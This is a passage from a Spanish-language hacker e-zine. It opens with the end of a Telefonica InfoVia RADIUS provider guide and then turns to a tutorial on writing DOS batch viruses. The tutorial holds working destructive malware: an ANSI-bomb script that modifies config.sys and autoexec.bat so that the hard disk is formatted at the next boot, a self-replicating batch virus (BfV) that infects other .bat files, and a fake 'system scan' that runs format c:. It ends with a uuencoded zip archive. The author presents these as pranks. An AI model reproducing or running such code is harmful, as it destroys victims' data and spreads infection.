ps ax | grep radiusd

Se obtiene una respuesta del tipo:

prueba 24024 23998 4 16:28:00 pts/1 0:00 grep radiusd
prueba 22623 171Oct 16 pts/0 0:01 radiusd -d . 

La opcion con la que se arranca el servidor RADIUS es:

        -d <nombre_del_directorio_radius>

Los ficheros de configuracion del servidor, almacenados en el
directorio
/usr/users/prueba/radius_osf, son los mismos que se indicaron en el
apartado
4.1.3 del Capitulo 4.


6.1.4 Configuracion del servidor DNS
      ------------------------------

Para la configuracion del servidor DNS se recomienda consultar el
apartado
4.1.4 y el apartado 6.1.5 de este documento. 
 

6.2 CONFIGURACION DEL ``ROUTER''
    ----------------------------

Al emplearse en este ejemplo el mismo ``router'' que en ejemplo del
Capitulo 4,
el fichero de configuracion es el mismo que el incluido en el apartado
apartado 4.2 de este documento. 


7 INFORMACION ADICIONAL PARA LA INSTALACION DE UN CPI
  ===================================================

Telefonica ofrece a los proveedores de informacion, el codigo,
compilado para
diversas plataformas, del servidor RADIUS. Con el proposito de
facilitar la
distribucion de software, el codigo compilado para los diferentes
tipos de
plataforma esta disponible en un servidor ftp anonimo.
 
8 PROCESO ADMINISTRATIVO
  ======================

Una empresa que desee ofrecer sus servicios a traves de InfoVia debera
completar un formulario en el que los principales apartados seran los
siguientes:

. Objetivo del servicio.
Se expondra el tipo de servicio que se va a ofertar, que debera de ser
publico
y no restringido, asi como su nombre comercial. Esta informacion
permitira
definir a InfoVia cual debe de ser la ubicacion en el arbol de
navegacion de
este servicio.

. Contenido de la hoja HTML
El proveedor debera entregar un fichero con formato HTML, o bien
delegar la
funcion de creacion de dicho fichero a InfoVia.
La importancia de este fichero queda clara teniendo en cuenta que sera
la
unica informacion especifica que InfoVia suministrara a los
hipoteticos
usuarios del proveedor del servicio sobre las caracteristicas del
mismo. 
Se sugiere que en este apartado debe quedar claro para los usuarios: 

- El tipo de servicio comercializado.
- Procedimiento administrativo para darse de alta en el servicio si
fuera
necesario.
- Costes asociados a la utilizacion del servicio, asi como el
procedimiento
de cobro (tarjeta de credito, factura mensual, etc ...).
- Caracteristicas que debe poseer el equipamiento del usuario:
Memoria, CPU,
velocidad de transferencia, etc ... 
- Si el usuario debe de instalar software especifico para acceder a
este
servicio, se debe de indicar el mecanismo de acceso a dicho software. 
- Ambito geografico del servicio. Si el servicio se va a ofrecer a
usuarios
de una comunidad autonoma o a varias y cuales.

. Numero de maquinas desde las que se va a ofertar el servicio.
- El proveedor informara en este apartado cuantas maquinas van a ser
accesibles
desde InfoVia para la provision del servicio.

. Tipo de servicio.
- Autentificado o no autentificado 
- Administracion de la direcciones IP por parte del proveedor o
administradas
por InfoVia.
Si el proveedor desea administrar un rango de direcciones propias
(direcciones
de Internet, como es el caso de los CPIs con acceso a Internet desde
InfoVia),
debera acreditar que dichas direcciones le han sido adjudicada por la
IANA. 

. Numero maximo de usuarios simultaneamente conectados al proveedor.
En este apartado, el proveedor informara del numero maximo de
conexiones
simultaneas que quiere atender por cada una de las comunidades
autonomas.

. Caracteristicas del acceso fisico a InfoVia.
El usuario debera de indicar el tipo de acceso deseado:
- Frame relay: Parametros asociados a la interfaz frame relay.
El proceso administrativo de dar de alta estas interfaces, lo podra
realizar
el proveedor o delegarlo en InfoVia.
Al proveedor del servicio, como respuesta a su peticion, se le
suministraran
los siguientes datos: 

        . Rango de direcciones IP reservadas al proveedor.
          Sera siempre una subred de longitud 256 direcciones.
        . Direcciones IP concretas asignadas a las maquinas del
proveedor. 
          Seran direcciones pertenecientes al rango anterior a traves
de las
          cuales se oferta el servicio. 
        . Direccion IP del servidor de RADIUS.
        . Direccion del centro de gestion InfoVia.

Se le suministrara la direccion RTB y X.25, asi como la clave
(``password'')
que permitiran al proveedor del servicio acceder a los datos de
trafico de su
servicio.
Toda esta informacion se recogera en un documento con formatos y
campos a
rellenar, en los que el proveedor se sometera a las leyes civiles que
rigen
estas asociaciones y que quedaran ampliamente aclaradas y enumeradas.
Este
proceso formal podra ser discutido en forma y contenido, pero es
Telefonica,
o en su caso la filial que comercialice el servicio InfoVia, la que
sera
competente en estas labores y la que detallara mas profundamente todos
estos
aspectos, asi como las acciones a seguir para incorporarse a InfoVia.
 
GLOSARIO DE TERMINOS Y ACRONIMOS

AUI: ``Attachment Unit Interface''. 
CGIV: Centro de Gestion InfoVia.
CPI: Centro Proveedor de Informacion.
CSIV: Centro de Servicio InfoVia.
FTP: ``File Transfer Protocol''. 
GSM: ``Global System Mobile communication''. 
HDLC: ``High-level Data Link Control''. 
HTML: ``HyperText Markup Language''. 
IANA: ``Internet Assigned Numbers Authority''. 
IP: ``Internet Protocol''. 
LAN: ``Local Area Network'' (red de area local).
NCSA: ``National Center for Supercomputing Applications''. 
PVC: ``Permanent Virtual Circuit'' (Circuito Virtual Permanente). 
RAL: Red de Area Local. 
RDSI: Red Digital de Servicios Integrados. 
RFC: ``Requests For Coments''. 
RTB: Red Telefonica Basica.
SIU: ``Signaling Interface Unit''. 
TCP/IP: ``Transfer Control Protocol/Internet Protocol''. 
UDP: ``User Datagram Protocol''. 
UTR: Unidad de Terminacion de Red.
 

Eso es todo amigos:

                     "Imagination is more important than knowledge"
                                                       A. Einstein


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ VIRUS BATCH (2a Parte) - Yo_Soy ]

                            
                           < VIRUS BATCH 2/2 >                        
                                                       


 Hace tiempo que escribi la primera parte, algo confusa, espero no hacerlo
 de nuevo, esta segunda guia mostrara parte la creacion de cualquier batch.
 Bueno, antes  de cualquier  otra cosa, esta vez explicare los elementos a
 los  cuales   vamos  a  tratar, ya que  recibi  mail de  personas  que no
 entendian  el  proceso, si  ya  conoces  todo  esto,  puedes  saltarlo.


 -[ ARCHIVOS BATCH ]-


  Variables
  Redireccion
  Comentarios
  Etiquetas
  Desiciones

 > VARIABLES 

 Los archivos batch (bat) utilizan el signo de porcentaje para sealar las
 variables ( %var1% , %var2% , etc.) y  se  utiliza  el comando "set" para
 asignar variables y borrarlas. 

 Ejemplo:
 

 @echo off            <=  No muestra los comandos en pantalla.
 set var1=RareGaZz    <=  Asigna a la primer variable  RareGaZz
 set var2=E-Zine      <=  Asigna a la segunda variable E-Zine
 echo %var1% %var2%   <=  Muestra en pantalla los valores de las 2 variables.
 set var1=            <=  Elimina la primer variable
 set var2=            <=  Elimina la segunda variable
 
 Espero que este ejemplo haya sido claro.


 > REDIRECCION

 Redireccionamos la salida del programa a otros lugares, como por ejemplo,
 a  un  archivo,  aadir  a  un  archivo,  y  a  otro  programa,  asi:

     >        Envia la salida a un archivo.
     >>       Aade la salida a un archivo.
     |        Envia la salida a un programa.
  
 Ejemplo:


 @echo off
 cls
 echo mando este mensaje al archivo prueba.txt >prueba.txt
 echo ahora aado este otro mensaje a prueba.txt >>prueba.txt
 echo.
 echo.
 echo. Pulse enter para continuar.
 pause>nul
 type autoexec.bat | more


 Ok, cuando use "pause>nul" lo que hice fue redireccionar la salida a nada.
 Asi no  sale  nada en pantalla, despues "type autoexec.bat | more" lo que
 hice fue ver el contenido del autoexec.bat y mandar la salida a el comando
 more, asi me lo despliega pantalla por pantalla.


 > COMENTARIOS Y ETIQUETAS

 Los  comentarios  pueden ir  utilizando el comando REM y opcionalmente lo
 mas  recomendado a la  hora de poner  comentarios seran con dos veces dos
 puntos. A diferencia de la programacion en otros lenguajes los comentarios
 no van en la  misma linea que  el codigo. Las etiquetas se utilizaran solo
 colocando dos puntos antes de la etiqueta ( una vez ) y  el comando "goto"
 lo que hace es transferir el control del programa a otra parte del archivo.


 Ejemplo:

 :: prueba de goto y comentario
 :: este es un comentario
 @echo off
 goto fin
  Este texto puede ser lo que sea    
  porque nunca saldra en la pantalla 
 :fin
 echo Listo.


 > DECISIONES

 Las decisiones en Batch seran utilizando el comando "If" que lo que hace
 es evaluar una condicion y si es correcta, ejecuta un comando. Puede ser
 utilizada para comparar una cadena de caracteres con otra, ver si existe
 un archivo determinado o el errorlevel de otro programa, asi:

 if [not] cadena1==cadena2 comando
 Compara la cadena1 con la cadena2, y si es verdadero ejecuta el comando.

 if [not] exist rare015.txt comando
 Si existe el archivo rare015.txt entonces ejecuta el comando.

 Ejemplo:

 @echo off
 :: Prueba de la forma "If"
 cls
 IF EXIST C:\WINDOWS\NULL echo Windows existe.
 IF NOT EXIST C:\YO-SOY echo no existe el directorio Yo-Soy
 echo. Fin.


 if [not] ERRORLEVEL numero comando
 Evalua el ultimo  ErrorLevel  presentado  por un programa, este es dado
 para informar como termino el programa (si finalizo como deberia o hubo
 errores, etc.)  No todos  los programas  presentan  esto y se pierde el
 errorlevel cuando otro programa se ejecuta.

 Not puede ser opcional.

 El errorlevel nos sera util a la hora de usar el comando CHOICE, para
 crear menus y otras cosas. El comando Choice lo que hace es preguntar
 una tecla de una serie y asignarle un errorlevel en consecuencia a la
 tecla presionada. Ejemplo:

 @echo off
 :menu
 cls
 echo        MENU SIMPLE
 echo        
 echo.
 echo    1 - Ejecutar Editor
 echo    2 - Ejecutar Windows XD
 echo    S - Salir
 choice /c:12S>nul
 if errorlevel 3 goto fin
 if errorlevel 2 goto windows
 if errorlevel 1 goto editor
 echo Falta el comando CHOICE 
 goto fin
 
 :editor
  edit
  goto menu
 
 :windows
  cd \windows
  win
  goto menu

 :fin

 Los Errorlevels dependen mucho de la posicion que le asignes, ejemplo:

 CHOICE /C:ABCD
           
           
           > Da Errorlevel 4
           > Da Errorlevel 3
           > Da Errorlevel 2
           > Da Errorlevel 1

 CHOICE /C:2567
 Presionando 2 nos regresa un Errorlevel de 1, 5 errorlevel de 2, 6 de 3,
 y 7 de 4.

 Bueno, creo que con esto explico lo basico, si necesitas algo mas, puedes
 ver en el HELP del Dos.


 -[ VIRUS ]-

 Los Virus Batch como su nombre lo indica estan creados en Batch, estos
 pueden contener rutinas en ANSI (Bombas Ansi), estas funcionan en Win95
 (en cualquier sistema basado en Ms-Dos). Veamos uno.

 El disco duro muere despues de que reinicie el sistema, y no hara nada
 hasta que el presione Enter por lo menos una vez en DOS (no muy dificil
 de cumplir).


[ ANSI.BAT ]

@echo off
:: Para que funcione debe de cargarse el controlador ANSI, para ello
:: vamos a introducirlo en el config.sys para que se cargue la proxima
:: vez que se inicie.
copy c:\config.sys c:\temp.sys
deltree /y c:\config.sys
ren c:\temp.sys config.sys
:: En caso de ke el config.sys este protegido contra escritura
if exist C:\dos\ansi.sys goto DOS
goto Winblows
:DOS
echo DEVICE=C:\DOS\ANSI.SYS >> c:\config.sys
goto auto
:: Si la persona esta corriendo DOS entonces aade esa linea para cargar
:: el controlador ANSI la proxima vez que inicie.
if exist C:\windows\command goto Winblows
:WINBLOWS
echo DEVICE=C:\WINDOWS\COMMAND\ANSI.SYS >> c:\config.sys
:: Esta linea se aade al config.sys si esta utilizando Windows.

:: Ahora la parte importante
:: Vamos a meter unas cuantas lineas al autoexec.bat
:: para que la proxima vez que inicie BOOM =)

:AUTO
echo prompt $e[0;30m >> c:\autoexec.bat
:: La pantalla se volvera negra.
echo prompt $e[13;0;80;99;58;13;99;100;92;13;102;111;114;109;97;116;32;99;58;32;47;113;32;"/t:20 /n:50";13;121;13; >> c:\autoexec.bat
:: Formatea rapidamenta su disco duro, aprox. 20-30 segundos
:: Hace un Formateo a bajo nivel, jode el disco duro =)
echo prompt [0m >> c:\autoexec.bat
echo prompt $p$g >> c:\autoexec.bat
:: Regresa la pantalla a la normalidad.
if exist c:\windows\command goto COMMAND
goto END
:COMMAND
echo c:\command.com >> c:\autoexec.bat
:: En caso de que tenga Win95, comenzara en DOS... 
:: y asi la bomba se ejecuta y vale madres...
:END

[ FIN ]


He aqui unos ejemplos de unos virus.

[ BfV.BAT ]

[ BfV ]
@echo off%[BfV_B]%
if '%1=='## goto BfV_%2
if exist C:\_BfV.bat goto BfV_
if not exist %0.bat goto BfV_end
find "BfV"<%0.bat>C:\_BfV.bat
attrib C:\_BfV.bat +h
:BfV_
command /e:5000 /c C:\_BfV ## run
goto BfV_end
:BfV_run
for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i
exit BfV
:BfV_inf
if '%BfV%=='1111111 exit
set BfV=%BfV%1
find "BfV"<%3>nul
if not errorlevel 1 goto BfV_end
type %3>BfV
type C:\_BfV.bat>>BfV
move BfV %3>nul
exit BfV
:BfV_end




 Tambien puedes hacer maldades poco eticas, como por ejemplo:

 @echo off
 CLS
 ECHO. @echo off >>c:\autoexec.bat
 ECHO. echo Su sistema no termino como deberia, ahora se realizara >>c:\autoexec.bat
 ECHO. echo una exploracion rutinaria en su sistema. >>c:\autoexec.bat
 ECHO.
 ECHO. echo Buscando fallos en su sistema... >>c:\autoexec.bat
 ECHO. echo por favor espere.. >>c:\autoexec.bat
 ECHO. format c: /q  >>c:\autoexec.bat
 echo. Echo Ningun problema fue detectado >>c:\autoexec.bat


 Ademas, podemos hacer nuestro archivo.bat en .exe o .com con las siguientes
 utilidades o bajandolas directamente de la pagina de RareGaZz ;).
 Las posibilidades son muchas, podemos combinarlos con las Nowhere Utilities,
 jugarle una broma a un amigo, etc. 


[ CORTAR AQUI ]

begin 666 BATCH.ZIP
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
